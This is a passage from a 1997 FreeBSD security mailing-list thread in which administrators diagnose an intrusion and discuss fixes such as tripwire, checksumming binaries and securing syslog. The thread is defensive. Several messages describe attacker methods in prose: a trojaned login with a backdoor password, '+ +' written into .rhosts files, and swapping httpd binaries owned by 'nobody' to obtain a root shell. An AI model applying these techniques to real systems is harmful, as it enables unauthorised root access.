would NOT be logged and so it was very difficult to tell what was going on. My only guess is that they used the old suidperl hack to get root. Supposedly this doesnt work on newer perl though. My suggestion to you would be to get a clean source tree, recompile everything and install tripwire. -David Langford langfod@dihelix.com >The symptoms are as follows: >1) User on mercury machine complained about perl5 not working which was >perl5.003 since libmalloc lib it was linked to was missing. >2) I recompiled the perl5 port from the ports tree and it's perl5.00403 >and it works. >3) User hacks earth when he doesn't even have a account on the machine >and can login to the machine remotely as root when rlogin and telnet >wouldn't allow it. >4) User is invisible in w, finger, who, users and can only be seen using >ps -agux on a pty so I killed the process. >5) User changes hostnames even in a netstat output so it's all garbage >6) We went to inetd.conf and shut off all daemons except telnetd and >rebooted and user still can get onto the machine invisibly. >7) User shuts down the machine and changes root password > > Saw the user on irc posting the password of earth with the login >name root. Any ideas? > > >Cheers, >Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ >Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] >GaiaNet Corporation - M & C Estate / / / / | / | __] ] >Beverly Hills, California USA 90210 / / / / / |/ / | __] ] >HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > > From owner-freebsd-security Mon Jul 28 11:32:39 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23304 for security-outgoing; Mon, 28 Jul 1997 11:32:39 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23293 for ; Mon, 28 Jul 1997 11:32:34 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id LAA05287; Mon, 28 Jul 1997 11:31:55 -0700 (PDT) Date: Mon, 28 Jul 1997 11:31:55 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Guido van Rooij , loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)> > BTW, does anyone know if there is a secure logging protocol? Syslog on =)> > UDP seems a tad unreliable, not to mention opening one up from DoS. I log =)> =)> Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped =)> with an option -s that makes it refuse syslog messages form remote =)> machins. This of course does not help if you want to be able to get =)> syslog entries from a remote host. But you can refure udp packet =)> with destination port 513 on your routers. =) =)Unfortunately, I don't have the liberty of reconfiguring some of the =)routers my hosts are acessible through. Using ipfirewall to restrict =)incoming messages is possible, but undesirable as it doesn't help against =)spoofing, if the threat is also inside your network. The vulnerable host =)in the -s case is the loghost, which must accept network log messages. =)Configuring with a default of -s is a good arrangement. What does the -s do anyways? I know it means secure but isn't it supposed to be secure already out of the box? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:34:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23451 for security-outgoing; Mon, 28 Jul 1997 11:34:20 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23426 for ; Mon, 28 Jul 1997 11:34:14 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id OAA03855; Mon, 28 Jul 1997 14:33:50 -0400 (EDT) Date: Mon, 28 Jul 1997 14:33:49 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Robert Watson wrote: > > =)> =)There was a security hole some time ago in perl that allowed local users > =)> =)to gain root access... That's probably the way he got root access... > =)> =)I would check my binaries, sup and recompile. > =)> > =)> Hmmm, I supped the perl from the most recent ports tree and also > =)> all the binaries are about 2 months old from the -current tree. I thought > =)> the security hole was way before that. What I didn't get is how did he > =)> get access to the second system (earth) when he doesn't have a account > =)> there in the first place? > =) > =)I'd be tempted to look in all the normal places -- sendmail, etc. What > =)daemons were running on the machine? Any web server processes? Also, I'd > =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is > =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be > =)extremely unhappy if we already know (s)he is messing with DNS entries. > > sendmail is running as well as apache httpd... ftpd, telnetd, and > ircd. No NIS. ALl I know was he managed to changed everyone's .rhosts > file when it doesn't exist originally and the contents just had: > + + > in it. This guy sounds like either he has good tools, or good experience. For safety's sake, I'd guess the latter. All he needed was one sniffed password to get on the system, and then you may be stuck with known holes in application software. Most of the security problems I've seen have started with a sniffed password, but this comes from dormitory experience :). Your best hope at this point is to shut down the system, boot on a floppy with a CDROM mounted, and then do a strategic MD5 checksum of all binaries and check for changes. If you're running STABLE, your best bet may be to sup down differences, but to reinstall the binaries necessary to support the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. If he's made enough changes to zap syslog, netstat, login-stuff, I wouldn't trust any other tools on the system currently. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 11:44:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA24079 for security-outgoing; Mon, 28 Jul 1997 11:44:59 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA24072 for ; Mon, 28 Jul 1997 11:44:56 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id OAA03882; Mon, 28 Jul 1997 14:44:30 -0400 (EDT) Date: Mon, 28 Jul 1997 14:44:30 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Guido van Rooij , loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Robert Watson wrote: > > What does the -s do anyways? I know it means secure but isn't it > supposed to be secure already out of the box? -s prevents syslogd from accepting network network log messages. Without it, anyone who can deliver a packet to the syslog port using UDP can add a line to your system logs. When you add entries to syslog.conf like this: *.error @loghost.domain you rely on not having the -s flag set. Allowing log messages from unauthorized hosts is a security problem, as someone can insert ficticious messages (often-times, spoofed), flood your logs, etc. Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 12:29:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA26473 for security-outgoing; Mon, 28 Jul 1997 12:29:55 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA26460 for ; Mon, 28 Jul 1997 12:29:51 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id PAA03977; Mon, 28 Jul 1997 15:29:44 -0400 (EDT) Date: Mon, 28 Jul 1997 15:29:43 -0400 (EDT) From: Robert Watson Reply-To: Robert Watson To: security@FreeBSD.ORG cc: Adam Shostack , "Rodney W. Grimes" , dholland@eecs.harvard.edu Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: > Perhaps we should add another field that has bits to define the > requirement that a given log message be transmitted using authenticity, > confidentiality, and whether it is worth being stored. In any situation > where there was significant doubt, the message would be discarded for > security reasons, or logged locally and a message passed later to indicate > the problem. Also, should authenticity by against a global name space > (DNSsec), and then permission to store messages from a given identity by > defined against that name space, or should it be for transaction-level > only? I'd almost be tempted to define a wrapper packaging for syslog > messages like so: > > u_int16_t sl_flags > u_int8_t sl_prot_type > u_int8_t sl_entity_len > u_int8_t sl_entity[] > u_int32_t sl_timesigned > u_int16_t sl_type > u_int16_t sl_priority > u_int16_t sl_msglen > u_int8_t sl_message[] > u_int8_t sl_signature_len > u_int8_t sl_signature[] > > Where the signature is over all values present except for the > signature+length itself. Type of protection used would be in the > protection type field. This would allow storage of complete log entry > entities, including the signing identity, signature that proves it signed > the data, priority, etc. This would not provide for guarunteed delivery- > -- that would be the responsibility of the transport mechanism used by > syslog. This could actually by the stored log entry used on syslog > servers. To prevent replay (if not provided by the transport), perhaps a > sl_log_id (u_int16_t?) could be provided, which would also indicate jumps > in the sequence, etc. Having thought about this a little more, I'd be tempted to go for a more variable data section to this. Probably in the form of a u_int8_t num_records variable, and then a number of strings representing those records, each with variable length. Also, possibly priority. Clustering similar log messages for the sakes of reducing transmissions and number of signing operations is probably a good idea, but retaining order is important too. Has anyone looked statistically at the distribution of log messages on a standard web server or user server (whatever that means?) to see whether messages cluster by source, priority, type, etc? Is there any concensus on the use of DNSsec in the network community, as it has not yet been made widely available (or at least, it is available, but not largely used.) The key namespace here could be used however one desired, nor necessarily in a DNS-style way. The entity-name, whatever that is, simply suggests which key/algorithm should be used, a server could be configured to pull that information from DNSsec, or from an internal key-file (or both.) Also, if we make a move to TCP, how should connection-management be worked? Presumably, one must make a connection fairly quickly on receiving to send, assuming that it passes any local authenticity requirements (e.g., a log-message must come from a key in *.my.domain to be forwarded), and then put in a queue for delivery when the transport is available. If the TCP connection is already open, and a new message doesn't arrive quickly, it should be delivered. If the TCP connection is not open, then the forwarder (or source) should wait for a certain time-out (something short) for more messages, or until the queue reaches a threshhold before opening the connection. Some delay is acceptable in log delivery, I think, but not too much. Opening the connection will involve a delay -- a T/TCP startup is probably a good idea, as data is immediately ready to send when the connection is opened, or it would not be opening. An ACK message has already been stated as desirable -- would a simple signature over the last packet (or header + signature) using the shared secret, entity public key, or whatever, back on the TCP connection suffice? Maybe something lighter-weight? Robert N Watson Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ Network Security Research, Trusted Information Systems http://www.tis.com/ Network Administrator, SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ From owner-freebsd-security Mon Jul 28 12:29:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA26482 for security-outgoing; Mon, 28 Jul 1997 12:29:56 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA26466 for ; Mon, 28 Jul 1997 12:29:53 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05613; Mon, 28 Jul 1997 12:29:44 -0700 (PDT) Date: Mon, 28 Jul 1997 12:29:43 -0700 (PDT) From: Vincent Poy To: David Langford cc: security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707281830.IAA15209@caliban.dihelix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, David Langford wrote: =)I recently caught a breakin faily simaliar. =)The perp replace /bin/login with one that would let them login =)to ANY account with a password of "lemmein". The login would NOT be logged =)and so it was very difficult to tell what was going on. Hmmm, I can understand this can be done if the user had access to the system in the first place which he did on the mercury machine but how did he do it on the earth machine? =)My only guess is that they used the old suidperl hack to get root. =)Supposedly this doesnt work on newer perl though. I supped the latest ports tree, build and install perl5.00401 and sperl5.00401 and deleted the perl5.003 and sperl5.003 in /usr/local/bin so it wasn't the old version of perl. =)My suggestion to you would be to get a clean source tree, recompile everything =)and install tripwire. I'll do that as soon as the machine comes back up. I heard that suid programs can be a problem too but which ones are required to be suid? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:38:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27066 for security-outgoing; Mon, 28 Jul 1997 12:38:57 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27061 for ; Mon, 28 Jul 1997 12:38:55 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05662; Mon, 28 Jul 1997 12:38:36 -0700 (PDT) Date: Mon, 28 Jul 1997 12:38:35 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)> =)I'd be tempted to look in all the normal places -- sendmail, etc. What =)> =)daemons were running on the machine? Any web server processes? Also, I'd =)> =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is =)> =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be =)> =)extremely unhappy if we already know (s)he is messing with DNS entries. =)> =)> sendmail is running as well as apache httpd... ftpd, telnetd, and =)> ircd. No NIS. ALl I know was he managed to changed everyone's .rhosts =)> file when it doesn't exist originally and the contents just had: =)> + + =)> in it. =) =)This guy sounds like either he has good tools, or good experience. For =)safety's sake, I'd guess the latter. All he needed was one sniffed =)password to get on the system, and then you may be stuck with known holes =)in application software. Most of the security problems I've seen have =)started with a sniffed password, but this comes from dormitory experience =):). Yep, sniffing would work but can they actually sniff outside of the network? =)Your best hope at this point is to shut down the system, boot on a floppy =)with a CDROM mounted, and then do a strategic MD5 checksum of all binaries =)and check for changes. If you're running STABLE, your best bet may be to =)sup down differences, but to reinstall the binaries necessary to support =)the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. =)If he's made enough changes to zap syslog, netstat, login-stuff, I =)wouldn't trust any other tools on the system currently. Not even a rebuild of -current after cvs? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:49:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27688 for security-outgoing; Mon, 28 Jul 1997 12:49:13 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27683 for ; Mon, 28 Jul 1997 12:49:11 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05729; Mon, 28 Jul 1997 12:49:01 -0700 (PDT) Date: Mon, 28 Jul 1997 12:49:00 -0700 (PDT) From: Vincent Poy To: Ollivier Robert cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <19970728171633.10794@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Ollivier Robert wrote: =)According to Vincent Poy: =)> 1) User on mercury machine complained about perl5 not working which was =)> perl5.003 since libmalloc lib it was linked to was missing. =)> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 =)> and it works. =) =)I don't think he used perl to hack root unless you kept old versions of =)Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by =)Werner. 5.003+ holes are fixed in 5.004 and later. Nope, when I added perl5 yesterday from the ports tree, I deleted the perl5.003 and sperl5.003 that was there after it got updated to perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way? =)> 6) We went to inetd.conf and shut off all daemons except telnetd and =)> rebooted and user still can get onto the machine invisibly. =) =)That shows that he has used a spare port to hook a root shell on. In these =)case, "netstat -a" or "lsof -i:TCP" will give you all connections, =)including those on which a program is LISTENing to. That way you'll catch =)any process left on a port. True but netstat wasn't working anymore after we kicked him off the first time and rejected all packets from his ip # when he came back on. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:52:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27954 for security-outgoing; Mon, 28 Jul 1997 12:52:10 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27938 for ; Mon, 28 Jul 1997 12:52:06 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id PAA12711; Mon, 28 Jul 1997 15:50:44 GMT Date: Mon, 28 Jul 1997 15:50:44 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Robert Watson cc: Vincent Poy , Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk There IS one common hole I've seen apache and stronghold have, and that is that some people like to leave their sessiond or httpd files owned by 'nobody'. This allows somebody running CGI on that system to replace those binaries with their own, hacked binaries (since the scripts are usually owned as nobody), and the next time httpd starts, they can make it write a root shell, or just about anything along those lines. ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Robert Watson wrote: :On Mon, 28 Jul 1997, Vincent Poy wrote: : :> On Mon, 28 Jul 1997, Robert Watson wrote: :> :> =)> =)There was a security hole some time ago in perl that allowed local users :> =)> =)to gain root access... That's probably the way he got root access... :> =)> =)I would check my binaries, sup and recompile. :> =)> :> =)> Hmmm, I supped the perl from the most recent ports tree and also :> =)> all the binaries are about 2 months old from the -current tree. I thought :> =)> the security hole was way before that. What I didn't get is how did he :> =)> get access to the second system (earth) when he doesn't have a account :> =)> there in the first place? :> =) :> =)I'd be tempted to look in all the normal places -- sendmail, etc. What :> =)daemons were running on the machine? Any web server processes? Also, I'd :> =)heavily suspect that he sniffed a password if no encrypted telnet/ssh is :> =)in use.. Any use of NIS going on? Also, .rhosts arrangements can be :> =)extremely unhappy if we already know (s)he is messing with DNS entries. :> :> sendmail is running as well as apache httpd... ftpd, telnetd, and :> ircd. No NIS. ALl I know was he managed to changed everyone's .rhosts :> file when it doesn't exist originally and the contents just had: :> + + :> in it. : :This guy sounds like either he has good tools, or good experience. For :safety's sake, I'd guess the latter. All he needed was one sniffed :password to get on the system, and then you may be stuck with known holes :in application software. Most of the security problems I've seen have :started with a sniffed password, but this comes from dormitory experience ::). : :Your best hope at this point is to shut down the system, boot on a floppy :with a CDROM mounted, and then do a strategic MD5 checksum of all binaries :and check for changes. If you're running STABLE, your best bet may be to :sup down differences, but to reinstall the binaries necessary to support :the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. :If he's made enough changes to zap syslog, netstat, login-stuff, I :wouldn't trust any other tools on the system currently. : : : Robert N Watson : :Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/ :Network Security Research, Trusted Information Systems http://www.tis.com/ :Network Administrator, SafePort Network Services http://www.safeport.com/ :robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/ : From owner-freebsd-security Mon Jul 28 12:52:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28019 for security-outgoing; Mon, 28 Jul 1997 12:52:47 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28011 for ; Mon, 28 Jul 1997 12:52:45 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05771; Mon, 28 Jul 1997 12:52:40 -0700 (PDT) Date: Mon, 28 Jul 1997 12:52:39 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in bsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)BTW: You said you didn't know how he hacked into your other system as he =)doesn't have an account on it. Do you have a .rhosts file in the root =)directory of the other server or a hosts.equiv file allowing the two to =)share root/other privileged logins between the two? As root he'd be able =)to su to anything. How about NFS/rdist permissions? There was no .rhosts file in root until he created it and the contents were just two +'s which I deleted the files afterwards but he still got back on. hosts.equiv is whatever FreeBSD shipped with, I never configure that file. Don't have NFS or rdist running either. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:55:08 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28129 for security-outgoing; Mon, 28 Jul 1997 12:55:08 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28122 for ; Mon, 28 Jul 1997 12:55:05 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id PAA12919 for ; Mon, 28 Jul 1997 15:54:27 GMT Date: Mon, 28 Jul 1997 15:54:26 +0000 (GMT) From: "Jonathan A. Zdziarski" To: security@freebsd.org Subject: security hole in FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I'm a little paranoid, as somebody hacked our syste about a month ago and said he would do it again. Where is the source code for /bin/login? I've checked /usr/src, the only thing I find is /usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but that doesn't seem right. ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 12:55:26 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28158 for security-outgoing; Mon, 28 Jul 1997 12:55:26 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28152 for ; Mon, 28 Jul 1997 12:55:24 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05794; Mon, 28 Jul 1997 12:55:14 -0700 (PDT) Date: Mon, 28 Jul 1997 12:55:13 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Ollivier Robert , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)I would check also /etc/inetd.conf to make sure he didn't set himself up =)with a root-environment on some port, I know finger -P will let you run =)for example a shell, and if it is set up as root, well... The inetd.conf file was unaltered since I checked that already. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:58:14 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28363 for security-outgoing; Mon, 28 Jul 1997 12:58:14 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28352 for ; Mon, 28 Jul 1997 12:58:10 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05814; Mon, 28 Jul 1997 12:56:33 -0700 (PDT) Date: Mon, 28 Jul 1997 12:56:33 -0700 (PDT) From: Vincent Poy To: Robert Watson cc: Guido van Rooij , loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Robert Watson wrote: =)> What does the -s do anyways? I know it means secure but isn't it =)> supposed to be secure already out of the box? =) =)-s prevents syslogd from accepting network network log messages. Without =)it, anyone who can deliver a packet to the syslog port using UDP can add a =)line to your system logs. When you add entries to syslog.conf like this: =) =)*.error @loghost.domain =) =)you rely on not having the -s flag set. =) =)Allowing log messages from unauthorized hosts is a security problem, as =)someone can insert ficticious messages (often-times, spoofed), flood your =)logs, etc. Never noticed this one, was there a reason FreeBSD shipped with -s off by default? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 13:09:21 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id NAA29230 for security-outgoing; Mon, 28 Jul 1997 13:09:21 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id NAA29225 for ; Mon, 28 Jul 1997 13:09:17 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id QAA07078; Mon, 28 Jul 1997 16:04:52 -0400 (EDT) From: Adam Shostack Message-Id: <199707282004.QAA07078@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: from Vincent Poy at "Jul 28, 97 12:29:43 pm" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Mon, 28 Jul 1997 16:04:51 -0400 (EDT) Cc: langfod@dihelix.com, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; 